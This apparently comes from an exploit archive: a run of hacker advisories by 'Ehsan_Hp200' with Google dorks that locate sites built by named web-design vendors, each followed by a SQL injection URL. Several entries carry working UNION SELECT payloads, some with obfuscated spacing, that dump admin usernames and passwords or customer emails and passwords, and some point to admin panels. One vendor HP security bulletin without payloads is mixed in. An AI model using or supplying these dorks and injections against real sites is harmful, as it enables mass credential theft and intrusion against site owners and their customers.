Dork : Graphic design Website design by Kimia inurl:id=
Exploite:
www.victim.com/image-details.php?id=[SQL]
www.victim.com/alert_article.php?id=[SQL]
www.victim.com/news-article.php?id=[SQL]
www.victim.com/gallery-list.php?id=[SQL]
www.victim.com/newsitem.php?id=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
Synchrony Infotech (product_details.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Synchrony Infotech (product_details.php?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.synchrony.co.in/
Persian Gulf 4 Ever!
Dork : Designed by synchrony infotech. inurl:product_details.php?id=
Exploite: www.victim.com/product_details.php?id=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
XWeavers (page.asp?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
XWeavers (page.asp?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://xweavers.com/
Persian Gulf 4 Ever!
Dork : inurl:page.asp?id= Designed and Developed by XWeavers.com
Exploite: www.victim.com/page.asp?id=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
Vegetav (news_item.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Vegetav (news_item.php?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.vegetav.co.uk/
Persian Gulf 4 Ever!
Dork : website design by Vegetav inurl:news_item.php?id=
Exploite: www.victim.com/news_item.php?id=-1+union+select+1,user(),3,version(),5,6
Admin Panel : www.victim.com/admin.php
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
cgcraft llc (info.php?id) (news_item.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
cgcraft llc (info.php?id) (news_item.php?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.cgcraft.com/
Persian Gulf 4 Ever!
Dork : website by cgCraft llc inurl:news_item.php?id=
Exploite: www.victim.com/news_item.php?id=-1 union select 1,2,username,4,5,6,7,8,pword,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from users
Dork : Website by cgCraft llc inurl:info.php?id=
Exploite: www.victim.com/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+users--
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
Coherendz (products.php?cat_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Coherendz (products.php?cat_id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.coherendz.com/
Persian Gulf 4 Ever!
Exploite: www.victim.com/products.php?cat_id=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
WOC Consulting (search_result.php?cid) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
WOC Consulting (search_result.php?cid)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.woc-consulting.com/
Persian Gulf 4 Ever!
Dork : Powered by WOC Consulting Canada
Exploite: www.victim.com/search_result.php?cid=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
Canoy Softwares (search_result.php?loc_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Canoy Softwares (search_result.php?loc_id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://canoysoft.in/
Persian Gulf 4 Ever!
Dork : Powered by Canoy Softwares inurl:search_result.php?loc_id=
Exploite: www.victim.com/search_result.php?loc_id=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
Zones Web Solution (status.asp?print) (search_result.php?loc_id) Remote SQL injection Vulnerabilities
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerabilities
Zones Web Solution (status.asp?print) (search_result.php?loc_id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.zones.in/
Persian Gulf 4 Ever!
Dork : Powered by Zones Web Solution inurl:status.asp?print=
Exploite: www.victim.com/status.asp?print=1cno=[SQL]
Dork : Powered by Zones Web Solution inurl:search_result.php?loc_id=
Exploite: www.victim.com/search_result.php?loc_id=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
Avon Groups (search_result.php?cid) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Avon Groups (search_result.php?cid)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.avongroups.in/it/
Persian Gulf 4 Ever!
Dork : Powered By: Avon Enterprises Pvt. Ltd. inurl:search_result.php?cid='
Exploite: www.victim.com/search_result.php?cid=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
Web Fusion Nepal (find.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Web Fusion Nepal (find.php?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://webfusion.com.np/
Persian Gulf 4 Ever!
Dork : Powered by: Web Fusion Nepal inurl:find.php?id=
Exploite: www.victim.com/find.php?id=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
Infocus Web Solutions (news_desc.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Infocus Web Solutions (news_desc.php?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.infocuswebdesigning.com/
Persian Gulf 4 Ever!
Dork : Powered by Infocus Web Solutions (P) Ltd. inurl:news_desc.php?id=
Exploite: www.victim.com/news_desc.php?id=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
A1 Solutions (cat_sell.php?cid) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
A1 Solutions (cat_sell.php?cid)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.a1sols.com/
Persian Gulf 4 Ever!
Dork : Powered by A1 Solutions inurl:cat_sell.php?cid=
Exploite: www.victim.com/cat_sell.php?cid=-1 union select 1,concat(user_name,0x3a,pass),1,1,1,1,1,1 from admin
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
indiacon (selloffers.php?cid) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
indiacon (selloffers.php?cid)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.indiacon.com/
Persian Gulf 4 Ever!
Dork : inurl:selloffers.php?cid= Powered by indiacon.com
Exploite: www.victim.com/selloffers.php?cid=9/**/union/**/select/**/1,concat(sb_admin_name,0x3a,sb_pwd),3,4,5,6,7,8/**/from/**/auto_admin
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
CobraScripts (selloffers.php?cid) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
CobraScripts (selloffers.php?cid)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://cobrascripts.com/
Persian Gulf 4 Ever!
Dork : Powered by CobraScripts inurl:cat_sell.php?cid=
Exploite: www.victim.com/selloffers.php?cid=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
[security bulletin] HPSBMU02693 SSRT100583 rev.1 - HP Network Automation Running on Linux, Solaris, and Windows, Remote SQL Injection, Cross Site Scripting (XSS)
SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02942385
Version: 1

HPSBMU02693 SSRT100583 rev.1 - HP Network Automation Running on Linux, Solaris, and Windows, Remote SQL Injection, Cross Site Scripting (XSS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2011-07-28
Last Updated: 2011-07-28

Potential Security Impact: Remote SQL injection, cross site scripting (XSS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Network Automation running on Linux, Solaris, and Windows. The vulnerabilities could be exploited remotely resulting in SQL injection and cross site scripting (XSS).

References: CVE-2011-2402 (XSS), CVE-2011-2403 (SQL injection)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Network Automation v7.2x, v7.5x, v7.6x, v9.0, v9.10

BACKGROUND

CVSS 2.0 Base Metrics
Reference       Base Vector                      Base Score
CVE-2011-2402   (AV:N/AC:M/Au:N/C:N/I:P/A:N)     4.3
CVE-2011-2403   (AV:N/AC:L/Au:S/C:C/I:C/A:C)     9.0
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION
HP has provided a patch to resolve the vulnerabilities for HP Network Automation v9.10. The patch is available here: http://support.openview.hp.com/selfsolve/patches

Upgrade to HP Network Automation v9.10
Apply patch 1 or subsequent (Title: Network Automation 09.10.01, Document ID: KM1207081)

HISTORY
Version:1 (rev.1) - 28 July 2011 Initial Release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2011 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
Gopal Systems (products.php?cat_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Gopal Systems (products.php?cat_id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.gopalsystems.com/
Persian Gulf 4 Ever!
Dork : Powered by: Gopal Systems. inurl:products.php?cat_id=
Exploite: www.victim.com/products.php?cat_id=-1 union select 1,2,3,4 from tbladmin
Admin Panel : www.victim.com/admin/
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
Agent Image (news_details.php?news_ID) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Agent Image (news_details.php?news_ID)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.agentimage.com/
Persian Gulf 4 Ever!
Dork : Design by Agent Image inurl:news_details.php?news_ID=
Exploite: www.victim.com/news_details.php?news_ID=[SQL]
Admin Panel: www.victim.com/admin/login.php
SpeCial TanX To : SaHand ShaBan , Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
G2webCMS (products.php?cat_id) (member-profile.php?profile) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
G2webCMS (products.php?cat_id) (member-profile.php?profile)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.g2web.com/
Persian Gulf 4 Ever!
Dork : Powered by G2webCMS inurl:products.php?cat_id=
Exploite: www.victim.com/store/products.php?cat_id=[SQL]
Dork : Powered by G2webCMS inurl:member-profile.php?profile=
Exploite: www.victim.com/member-profile.php?profile=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
iCube Lab (product_details.php?cat_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
iCube Lab (product_details.php?cat_id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.icubelab.com/
Persian Gulf 4 Ever!
Dork : Powered by iCube Lab inurl:product_details.php?cat_id=
Exploite: www.victim.com/product_details.php?cat_id=-1/**/union/**/select/**/Null,concat(email,0x3a,password),Null/**/from/**/user
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
Solutiontech (product.php?cat_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Solutiontech (product.php?cat_id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.solutiontechindia.com/
Persian Gulf 4 Ever!
Dork : Powered by Solutiontech inurl:product.php'
Exploite: www.victim.com/product.php?cat_id=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
Chrome Web Solutions (details.php?cat_id) (listing_more.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Chrome Web Solutions (details.php?cat_id) (listing_more.php?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.chromewebsolutions.com/
Persian Gulf 4 Ever!
Dork : Powered By : Chrome Web Solutions inurl:details.php?cat_id=
Exploite: www.victim.com/details.php?cat_id=[SQL]
Dork : Powered By : Chrome Web Solutions inurl:listing_more.php?id=
Exploite: www.victim.com/listing_more.php?id=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
Dow Group (dynamic.php?id) (sub.php?solutioncat_id) (news_desc.php?id) (product.php?id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Dow Group (dynamic.php?id) (sub.php?solutioncat_id) (news_desc.php?id) (product.php?id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.dowgroup.com/
Persian Gulf 4 Ever!
Dork : Designed by Dow Group inurl:dynamic.php?id=
Exploite: www.victim.com/dynamic.php?id=[SQL]
Dork : Designed by Dow Group inurl:news_desc.php?id=
Exploite: www.victim.com/news_desc.php?id=[SQL]
Dork : Designed by Dow Group product.php?id=
Exploite: www.victim.com/product.php?id=[SQL]
Dork : Designed by Dow Group inurl:solutions.php?id=
Exploite: www.victim.com/solutions.php?id=[SQL]
Dork : inurl:sub.php?solutioncat_id=
Exploite: www.victim.com/sub.php?solutioncat_id=[SQL]
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
Zones Web Solution (index.php?manufacturers_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Zones Web Solution (index.php?manufacturers_id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.zones.in/
Persian Gulf 4 Ever!
Dork : Powered By : Zones Web Solution inurl:index.php?manufacturers_id='
Exploite: www.victim.com/index.php?manufacturers_id=-1 union select concat(customers_email_address,0x3a,customers_password) from customers
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD
Funnel Web (items.php?cat_id) Remote SQL injection Vulnerability
IRANIAN THE BEST HACKERS IN THE WORLD
Remote SQL injection Vulnerability
Funnel Web (items.php?cat_id)
AuTh0r : Ehsan_Hp200
H0ME : www.ehsanhp.blogsky.com
Email: ehsan_hp...@hotmail.com
Vendor : http://www.funnel-web.com.au/
Persian Gulf 4 Ever!
Dork : Web site design by Funnel Web inurl:items.php
Exploite: www.victim.com/items.php?cat_id=-1+Union+Select+1,concat(user_id,0x3a,user_pw),1+From+admin--
SpeCial TanX To : Dj7Xpl
IRANIAN THE BEST HACKERS IN THE WORLD